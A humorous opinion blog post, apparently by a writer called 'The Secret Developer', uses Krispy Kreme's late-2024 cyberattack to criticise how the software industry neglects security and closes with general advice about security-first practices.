How Krispy Kreme’s Cybersecurity Went Stale🍩

Written By The Secret Developer

Photo by Alice Pasqual on Unsplash

Stale coffee is getting to be more common in our office. I understand that this is getting more ubiquitous and represents the declining quality standard in software development.

Another thing that seems to be popular these days is falling victim to a cyber attack.

So, well done to Krispy Kreme for combining the two with its recent cyberattack. So, let’s glaze over the details of their donuts for a moment to talk about the gaping security hole in their tech stack.

The Hole in the Donut

Krispy Kreme’s online ordering systems went offline in late November due to an undisclosed vulnerability, a fact the company sheepishly admitted in its latest SEC filing

Customers across the U.S. are left tapping refresh on a broken digital experience. The attack is expected to cause financial losses, not just from the digital sales that evaporated but also from the obligatory too-late hiring of cybersecurity experts and the restoration of compromised systems.

This isn’t right. The industry’s increasing reliance on half-baked digital systems without thorough testing is causing a rising number of cyberattacks throughout 2024.

Why Security is Always the Last Item on the Sprint Backlog

In tech, security is an afterthought. 

This isn’t limited to a donut company (there’s a hole in their business plan as well as products), as they’ll be rushing features out of the door. Sure, they create the MVP and it might even scale, but nobody remembers to patch those APIs or check whether storing passwords in plaintext was really a good idea (protip: it wasn’t).

From my own experience, security reviews are few and far between. Everyone agrees it’s important, but nobody wants to do it and when they do it’s a half-job. It seems that customers expect their privacy to be breached these days, and don’t lose trust. The public are becoming part of the problem these days.

Aspirin for Corporate Headaches

Krispy Kreme expects its cybersecurity insurance to “offset a portion of the costs”. We should be happy that this hasn’t hit their shareholders, but I can’t feel any emotion towards the wheels of capitalism.

Why fix a problem when you can get someone else’s money to fix the problem? Patching critical bugs comes out of software developers’ personal time.

Companies no longer seem to worry about the reputation hit. Makes sense though, when Krispy Kreme donuts taste like that.

Oh Dear

Dough. Fritter. Jam. Fry.

I’m above the obvious puns.

Lessons From the Glazed Battlefield

Security First

It’s not glamorous, but building security into your processes is critical. The customers are going to get wise about which companies care about them. Which granted is none at the moment, but eventually, companies will start to leverage trust again, and you should want to be in this space.

Trust No One

APIs, dependencies, and even your own code are potential weak points. Verify everything. Test, test, test.

Train Developers, Not Just Systems

Security awareness is like commenting on your code: often neglected, but life-saving when done right.

Conclusion

Ultimately, Krispy Kreme’s digital mishap is a reminder that software developers hold the keys to trust, and we should be working on making trusted platforms that work great for customers. 

But hey, at least Krispy Kreme has tasty consolation prizes for those braving their in-person stores.

The Secret Developer
Previous

The Battleground of the Software Developer’s Ego
Next

The Case Against Marathon TechWork Hours